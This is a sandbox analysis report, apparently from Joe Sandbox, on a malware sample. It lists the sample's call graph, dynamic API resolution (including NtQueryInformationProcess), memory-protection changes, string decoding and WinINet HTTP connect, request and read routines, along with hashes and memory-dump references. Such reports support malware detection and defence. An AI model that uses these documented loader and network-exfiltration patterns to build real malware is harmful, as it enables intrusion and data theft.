38706->38690 38706->38700 38706->38702 38706->38704 38706->38705 38707 82abb0 lstrcpy 38706->38707 38707->38706 38709 8276e3 GetVolumeInformationA 38708->38709 38710 8276dc 38708->38710 38711 827721 38709->38711 38710->38709 38712 82778c GetProcessHeap RtlAllocateHeap 38711->38712 38713 8277b8 wsprintfA 38712->38713 38714 8277a9 38712->38714 38716 82aa50 lstrcpy 38713->38716 38715 82aa50 lstrcpy 38714->38715 38717 825ff7 38715->38717 38716->38717 38717->37781 38719 82aab0 lstrcpy 38718->38719 38720 8148e9 38719->38720 38921 814800 38720->38921 38722 8148f5 38723 82aa50 lstrcpy 38722->38723 38724 814927 38723->38724 38725 82aa50 lstrcpy 38724->38725 38726 814934 38725->38726 38727 82aa50 lstrcpy 38726->38727 38728 814941 38727->38728 38729 82aa50 lstrcpy 38728->38729 38730 81494e 38729->38730 38731 82aa50 lstrcpy 38730->38731 38732 81495b InternetOpenA StrCmpCA 38731->38732 38733 814994 38732->38733 38734 814f1b InternetCloseHandle 38733->38734 38927 828cf0 38733->38927 38736 814f38 38734->38736 38942 81a210 CryptStringToBinaryA 38736->38942 38737 8149b3 38935 82ac30 38737->38935 38741 8149c6 38742 82abb0 lstrcpy 38741->38742 38747 8149cf 38742->38747 38743 82ab30 2 API calls 38744 814f55 38743->38744 38745 82acc0 4 API calls 38744->38745 38748 814f6b 38745->38748 38746 814f77 ctype 38750 82aab0 lstrcpy 38746->38750 38751 82acc0 4 API calls 38747->38751 38749 82abb0 lstrcpy 38748->38749 38749->38746 38763 814fa7 38750->38763 38752 8149f9 38751->38752 38753 82abb0 lstrcpy 38752->38753 38754 814a02 38753->38754 38755 82acc0 4 API calls 38754->38755 38756 814a21 38755->38756 38757 82abb0 lstrcpy 38756->38757 38758 814a2a 38757->38758 38759 82ac30 3 API calls 38758->38759 38760 814a48 38759->38760 38761 82abb0 lstrcpy 38760->38761 38762 814a51 38761->38762 38764 82acc0 4 API calls 38762->38764 38763->37784 38765 814a70 38764->38765 38766 82abb0 lstrcpy 38765->38766 38767 814a79 38766->38767 38768 82acc0 4 API calls 38767->38768 38769 814a98 38768->38769 38770 82abb0 lstrcpy 38769->38770 38771 814aa1 38770->38771 38772 82acc0 4 API calls 38771->38772 38773 814acd 38772->38773 38774 82ac30 3 API calls 38773->38774 38775 814ad4 38774->38775 38776 82abb0 lstrcpy 38775->38776 38777 814add 38776->38777 38778 814af3 InternetConnectA 38777->38778 38778->38734 38779 814b23 HttpOpenRequestA 38778->38779 38781 814b78 38779->38781 38782 814f0e InternetCloseHandle 38779->38782 38783 82acc0 4 API calls 38781->38783 38782->38734 38784 814b8c 38783->38784 38785 82abb0 lstrcpy 38784->38785 38786 814b95 38785->38786 38787 82ac30 3 API calls 38786->38787 38788 814bb3 38787->38788 38789 82abb0 lstrcpy 38788->38789 38790 814bbc 38789->38790 38791 82acc0 4 API calls 38790->38791 38792 814bdb 38791->38792 38793 82abb0 lstrcpy 38792->38793 38794 814be4 38793->38794 38795 82acc0 4 API calls 38794->38795 38796 814c05 38795->38796 38797 82abb0 lstrcpy 38796->38797 38798 814c0e 38797->38798 38799 82acc0 4 API calls 38798->38799 38800 814c2e 38799->38800 38801 82abb0 lstrcpy 38800->38801 38802 814c37 38801->38802 38803 82acc0 4 API calls 38802->38803 38804 814c56 38803->38804 38805 82abb0 lstrcpy 38804->38805 38806 814c5f 38805->38806 38807 82ac30 3 API calls 38806->38807 38808 814c7d 38807->38808 38809 82abb0 lstrcpy 38808->38809 38810 814c86 38809->38810 38811 82acc0 4 API calls 38810->38811 38812 814ca5 38811->38812 38813 82abb0 lstrcpy 38812->38813 38814 814cae 38813->38814 38815 82acc0 4 API calls 38814->38815 38816 814ccd 38815->38816 38817 82abb0 lstrcpy 38816->38817 38818 814cd6 38817->38818 38819 82ac30 3 API calls 38818->38819 38820 814cf4 38819->38820 38821 82abb0 lstrcpy 38820->38821 38822 814cfd 38821->38822 38823 82acc0 4 API calls 38822->38823 38824 814d1c 38823->38824 38825 82abb0 lstrcpy 38824->38825 38826 814d25 38825->38826 38827 82acc0 4 API calls 38826->38827 38828 814d46 38827->38828 38829 82abb0 lstrcpy 38828->38829 38830 814d4f 38829->38830 38831 82acc0 4 API calls 38830->38831 38832 814d6f 38831->38832 38833 82abb0 lstrcpy 38832->38833 38834 814d78 38833->38834 38835 82acc0 4 API calls 38834->38835 38836 814d97 38835->38836 38837 82abb0 lstrcpy 38836->38837 38838 814da0 38837->38838 38839 82ac30 3 API calls 38838->38839 38840 814dbe 38839->38840 38841 82abb0 lstrcpy 38840->38841 38842 814dc7 38841->38842 38843 82aa50 lstrcpy 38842->38843 38844 814de2 38843->38844 38845 82ac30 3 API calls 38844->38845 38846 814e03 38845->38846 38847 82ac30 3 API calls 38846->38847 38848 814e0a 38847->38848 38849 82abb0 lstrcpy 38848->38849 38850 814e16 38849->38850 38851 814e37 lstrlen 38850->38851 38852 814e4a 38851->38852 38853 814e53 lstrlen 38852->38853 38941 82ade0 38853->38941 38855 814e63 HttpSendRequestA 38856 814e82 InternetReadFile 38855->38856 38857 814eb7 InternetCloseHandle 38856->38857 38862 814eae 38856->38862 38860 82ab10 38857->38860 38859 82acc0 4 API calls 38859->38862 38860->38782 38861 82abb0 lstrcpy 38861->38862 38862->38856 38862->38857 38862->38859 38862->38861 38948 82ade0 38863->38948 38865 821a14 StrCmpCA 38866 821a1f ExitProcess 38865->38866 38877 821a27 38865->38877 38867 821c12 38867->37786 38868 821b82 StrCmpCA 38868->38877 38869 821b63 StrCmpCA 38869->38877 38870 821bc0 StrCmpCA 38870->38877 38871 821b41 StrCmpCA 38871->38877 38872 821ba1 StrCmpCA 38872->38877 38873 821acf StrCmpCA 38873->38877 38874 821aad StrCmpCA 38874->38877 38875 821b1f StrCmpCA 38875->38877 38876 821afd StrCmpCA 38876->38877 38877->38867 38877->38868 38877->38869 38877->38870 38877->38871 38877->38872 38877->38873 38877->38874 38877->38875 38877->38876 38878 82ab30 lstrlen lstrcpy 38877->38878 38878->38877 38879->37792 38880->37794 38881->37800 38882->37802 38883->37808 38884->37810 38885->37814 38886->37818 38887->37822 38888->37828 38889->37830 38890->37834 38891->37848 38892->37852 38893->37851 38894->37847 38895->37851 38896->37865 38897->37889 38898->37857 38899->37874 38900->37884 38901->37868 38902->37876 38903->37877 38904->37879 38905->37905 38906->37908 38907->37909 38908->37904 38909->37909 38910->37918 38913 82aab0 lstrcpy 38912->38913 38914 8116c3 38913->38914 38915 82aab0 lstrcpy 38914->38915 38916 8116d5 38915->38916 38917 82aab0 lstrcpy 38916->38917 38918 8116e7 38917->38918 38919 82aab0 lstrcpy 38918->38919 38920 8115a3 38919->38920 38920->38645 38922 814816 38921->38922 38923 814888 lstrlen 38922->38923 38947 82ade0 38923->38947 38925 814898 InternetCrackUrlA 38926 8148b7 38925->38926 38926->38722 38928 82aa50 lstrcpy 38927->38928 38929 828d04 38928->38929 38930 82aa50 lstrcpy 38929->38930 38931 828d12 GetSystemTime 38930->38931 38933 828d29 38931->38933 38932 82aab0 lstrcpy 38934 828d8c 38932->38934 38933->38932 38934->38737 38937 82ac41 38935->38937 38936 82ac98 38938 82aab0 lstrcpy 38936->38938 38937->38936 38940 82ac78 lstrcpy lstrcat 38937->38940 38939 82aca4 38938->38939 38939->38741 38940->38936 38941->38855 38943 81a249 LocalAlloc 38942->38943 38944 814f3e 38942->38944 38943->38944 38945 81a264 CryptStringToBinaryA 38943->38945 38944->38743 38944->38746 38945->38944 38946 81a289 LocalFree 38945->38946 38946->38944 38947->38925 38948->38865

                              Executed Functions

                              Function 00829BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 829bb0-829bc4 call 829aa0 663 829de3-829e42 LoadLibraryA * 5 660->663 664 829bca-829dde call 829ad0 GetProcAddress * 21 660->664 666 829e44-829e58 GetProcAddress 663->666 667 829e5d-829e64 663->667 664->663 666->667 669 829e96-829e9d 667->669 670 829e66-829e91 GetProcAddress * 2 667->670 671 829eb8-829ebf 669->671 672 829e9f-829eb3 GetProcAddress 669->672 670->669 673 829ec1-829ed4 GetProcAddress 671->673 674 829ed9-829ee0 671->674 672->671 673->674 675 829ee2-829f0c GetProcAddress * 2 674->675 676 829f11-829f12 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75900000,015F0750), ref: 00829BF1
                              • GetProcAddress.KERNEL32(75900000,015F0570), ref: 00829C0A
                              • GetProcAddress.KERNEL32(75900000,015F07C8), ref: 00829C22
                              • GetProcAddress.KERNEL32(75900000,015F05A0), ref: 00829C3A
                              • GetProcAddress.KERNEL32(75900000,015F07F8), ref: 00829C53
                              • GetProcAddress.KERNEL32(75900000,015F8B50), ref: 00829C6B
                              • GetProcAddress.KERNEL32(75900000,015E64E0), ref: 00829C83
                              • GetProcAddress.KERNEL32(75900000,015E6300), ref: 00829C9C
                              • GetProcAddress.KERNEL32(75900000,015F05B8), ref: 00829CB4
                              • GetProcAddress.KERNEL32(75900000,015F0678), ref: 00829CCC
                              • GetProcAddress.KERNEL32(75900000,015F05E8), ref: 00829CE5
                              • GetProcAddress.KERNEL32(75900000,015F0588), ref: 00829CFD
                              • GetProcAddress.KERNEL32(75900000,015E6320), ref: 00829D15
                              • GetProcAddress.KERNEL32(75900000,015F0600), ref: 00829D2E
                              • GetProcAddress.KERNEL32(75900000,015F0618), ref: 00829D46
                              • GetProcAddress.KERNEL32(75900000,015E6340), ref: 00829D5E
                              • GetProcAddress.KERNEL32(75900000,015F0630), ref: 00829D77
                              • GetProcAddress.KERNEL32(75900000,015F08A0), ref: 00829D8F
                              • GetProcAddress.KERNEL32(75900000,015E65A0), ref: 00829DA7
                              • GetProcAddress.KERNEL32(75900000,015F0888), ref: 00829DC0
                              • GetProcAddress.KERNEL32(75900000,015E6560), ref: 00829DD8
                              • LoadLibraryA.KERNEL32(015F0918,?,00826CA0), ref: 00829DEA
                              • LoadLibraryA.KERNEL32(015F08B8,?,00826CA0), ref: 00829DFB
                              • LoadLibraryA.KERNEL32(015F08E8,?,00826CA0), ref: 00829E0D
                              • LoadLibraryA.KERNEL32(015F08D0,?,00826CA0), ref: 00829E1F
                              • LoadLibraryA.KERNEL32(015F0900,?,00826CA0), ref: 00829E30
                              • GetProcAddress.KERNEL32(75070000,015F0858), ref: 00829E52
                              • GetProcAddress.KERNEL32(75FD0000,015F0870), ref: 00829E73
                              • GetProcAddress.KERNEL32(75FD0000,015F8CE8), ref: 00829E8B
                              • GetProcAddress.KERNEL32(75A50000,015F8E38), ref: 00829EAD
                              • GetProcAddress.KERNEL32(74E50000,015E65C0), ref: 00829ECE
                              • GetProcAddress.KERNEL32(76E80000,015F89F0), ref: 00829EEF
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00829F06
                              Strings
                              • NtQueryInformationProcess, xrefs: 00829EFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: b0cac25434d2d146c94ff8a04225fba4b5db4207b7fb92191adad4b014a39a80
                              • Instruction ID: cd8735c860c77c628bbe33e3fd36705fdecc715b5e7e216d6930a1d416db6eec
                              • Opcode Fuzzy Hash: b0cac25434d2d146c94ff8a04225fba4b5db4207b7fb92191adad4b014a39a80
                              • Instruction Fuzzy Hash: 09A10BB55082809FC385DFE8FCD899A7BA9E75D7417508A1AFA09CB270D634A943CF60
                              Function 00814610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 814610-8146e5 RtlAllocateHeap 781 8146f0-8146f6 764->781 782 8146fc-81479a 781->782 783 81479f-8147f9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0081465F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008147EC
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081478F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814693
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146B2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081476E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814672
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814728
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146BD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814784
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081467D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146FC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814763
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008147C0
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146D3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008147AA
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814667
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146A7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081471D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081479F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008147B5
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146C8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008147CB
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814707
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814779
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814712
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814688
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 39d644fd67591ae89d67829725b69b49f1feae9726856187e4f02bffadc4a96f
                              • Instruction ID: 9908a394dbfa472ee80f58abdd09b68643c585756f984fbbd4782f6d0286fc68
                              • Opcode Fuzzy Hash: 39d644fd67591ae89d67829725b69b49f1feae9726856187e4f02bffadc4a96f
                              • Instruction Fuzzy Hash: D841D8607C360C7EC62CB7AC885ED9DB656FF82F04F506044EBA6923C2EAB855604F95
                              Function 008162D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 8162d0-81635b call 82aab0 call 814800 call 82aa50 InternetOpenA StrCmpCA 1040 816364-816368 1033->1040 1041 81635d 1033->1041 1042 816559-816575 call 82aab0 call 82ab10 * 2 1040->1042 1043 81636e-816392 InternetConnectA 1040->1043 1041->1040 1062 816578-81657d 1042->1062 1045 816398-81639c 1043->1045 1046 81654f-816553 InternetCloseHandle 1043->1046 1048 8163aa 1045->1048 1049 81639e-8163a8 1045->1049 1046->1042 1051 8163b4-8163e2 HttpOpenRequestA 1048->1051 1049->1051 1053 816545-816549 InternetCloseHandle 1051->1053 1054 8163e8-8163ec 1051->1054 1053->1046 1056 816415-816455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 8163ee-81640f InternetSetOptionA 1054->1057 1059 816457-816477 call 82aa50 call 82ab10 * 2 1056->1059 1060 81647c-81649b call 828ad0 1056->1060 1057->1056 1059->1062 1067 816519-816539 call 82aa50 call 82ab10 * 2 1060->1067 1068 81649d-8164a4 1060->1068 1067->1062 1071 816517-81653f InternetCloseHandle 1068->1071 1072 8164a6-8164d0 InternetReadFile 1068->1072 1071->1053 1076 8164d2-8164d9 1072->1076 1077 8164db 1072->1077 1076->1077 1080 8164dd-816515 call 82acc0 call 82abb0 call 82ab10 1076->1080 1077->1071 1080->1072
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                              • HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0081644D
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008164BD
                              • InternetCloseHandle.WININET(00000000), ref: 0081653F
                              • InternetCloseHandle.WININET(00000000), ref: 00816549
                              • InternetCloseHandle.WININET(00000000), ref: 00816553
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: a6d79d48f1e182226449632832d81bb28c3c240d4e747eb38dbe76990d2f1281
                              • Instruction ID: 5952cbb4aea49d39634185c9530af3473e1754096c3ede0ea5cfe0ba6d92fc79
